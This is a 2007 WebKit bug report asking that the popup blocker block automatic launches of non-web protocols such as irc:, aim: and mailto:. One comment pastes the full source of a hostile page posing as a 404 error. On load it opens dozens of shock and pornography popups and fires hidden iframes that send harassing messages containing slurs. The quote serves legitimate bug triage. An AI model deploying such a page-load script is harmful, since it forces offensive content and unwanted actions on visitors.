Bug 12336

Summary: Popup blocker should block non-webkit handled protocols without user action
Product: WebKit Reporter: Rosyna <webkit-bugs>
Component: New BugsAssignee: Nobody <webkit-unassigned>
Status: NEW    
Severity: Normal CC: ap, ddkilzer, mumbaiescortspriya
Priority: P2    
Version: 420+   
Hardware: Mac   
OS: OS X 10.4   
URL: http://projects.info-pull.com/moab/MOAB-19-01-2007.html
Attachments:
Description Flags
MOAB-19-01-2007.html (CAUTION: MAY CONTAIN EXPLOIT) none

Rosyna
Reported 2007-01-19 14:20:39 PST
If you go to http://projects.info-pull.com/moab/MOAB-19-01-2007.html (DO NOT GO HERE, IT DOES EVIL!) it'll attempt to open a lot of irc:, aim:, and mailto: protocol links automatically. A large bunch of them. I think these should be considered non user initiated popups for the case of handling them in the popup blocker. I'm not actually sure if this is Safari or WebKit related. I'm not even sure if it is security related.
Attachments
MOAB-19-01-2007.html (CAUTION: MAY CONTAIN EXPLOIT) (1.63 KB, application/octet-stream)
2007-01-19 14:31 PST, David Kilzer (:ddkilzer) 		no flags
Details
View All Add attachment proposed patch, testcase, etc.
Rosyna
Comment 1 2007-01-19 14:21:51 PST
Err, I think all non-WebKit handled protocols (aim, mailto, irc, man page, telnet, et cetera) should be considered popups. Thinks like http, https, ftp, et cetera should remain as is.
David Kilzer (:ddkilzer)
Comment 2 2007-01-19 14:29:35 PST
(In reply to comment #1) > Err, I think all non-WebKit handled protocols (aim, mailto, irc, man page, > telnet, et cetera) should be considered popups. Thinks like http, https, ftp, > et cetera should remain as is. It appears like they're messing with people that are trying to view the next advisory early. The page doesn't contain an advisory description, it appears to be an exploit.
David Kilzer (:ddkilzer)
Comment 3 2007-01-19 14:31:51 PST
Created attachment 12564 [details] MOAB-19-01-2007.html (CAUTION: MAY CONTAIN EXPLOIT) Grabbed via wget. This appears to be an exploit. I set the MIME type on the attachment to application/octet-stream to force browsers to download the file.
Rosyna
Comment 4 2007-01-19 14:51:03 PST
nah, it's not an exploit, just annoying as hell. I edited my email addy out of the script and the channel it joins. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Not found</title> <meta http-equiv="refresh" content="10; url=http://halflife2.zoy.org/" /> <script> var shock = new Array(); shock[0] = "http://www.lemonparty.org/"; shock[1] = "http://pr0n.encyclopediadramatica.com/images/thumb/c/ca/Kitties.jpg/800px-Kitties.jpg"; shock[2] = "http://pr0n.encyclopediadramatica.com/images/thumb/a/ab/Painseries.jpg/800px-Painseries.jpg"; shock[3] = "http://www.encyclopediadramatica.com/index.php/Image:Ultimate.JPG"; shock[4] = "http://pr0n.encyclopediadramatica.com/images/thumb/1/1a/Pain.jpg/800px-Pain.jpg"; shock[5] = "http://www.geocities.com/gniger972/pooped.jpg"; shock[6] = "http://www.redcoat.net/pics/tubgirl.jpg"; var pisses = new Array(); pisses[0] = "irc://g4y" + Math.random()*3 + "@irc.freenode.org/#channel"; pisses[1] = "aim:goim?screenname=gay&message=i hrd yo like me"; pisses[2] = "mailto:<my email addy>&message=i hrd yo like me"; function pwnage() { pwn = document.getElementById('pwned'); for (x = 0; x < 90; x++) { var site = Math.round(Math.random()*shock.length); window.open(shock[site]); new_img = document.createElement('img'); new_img.src = shock[site]; pwn.appendChild(new_img); piss_you = document.createElement('iframe'); piss_you.src = pisses[Math.round(Math.random()*pisses.length)]; piss_you.width = 1; piss_you.height = 1; pwn.appendChild(piss_you); } } </script> </head> <body onload="pwnage()"> <h1 style="text-align:center;">404 - Not found</h1> <div id="pwned"></div> </body> </html>
Note You need to log in before you can comment on or make changes to this bug.